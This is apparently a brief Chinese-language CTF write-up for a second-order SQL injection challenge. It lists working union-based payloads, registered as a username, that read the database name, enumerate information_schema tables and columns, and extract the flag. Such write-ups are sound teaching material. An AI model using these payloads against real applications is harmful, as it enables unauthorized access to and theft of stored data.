October 2019 Twice SQL Injection

简单的sql注入

题目直接提示二次注入,而且没有任何过滤
先注册username=-1‘union select database()#
登录后直接回显数据库名。
直接开干

-1'union select group_concat(schema_name) from information_schema.schemata#获取数据库名
-1'union select group_concat(table_name) from information_schema.tables where table_schema=database()#获取当前数据库表名
-1'union select group_concat(column_name) from information_schema.columns where table_name='flag'#获取列名
-1'union select flag from flag#获取flag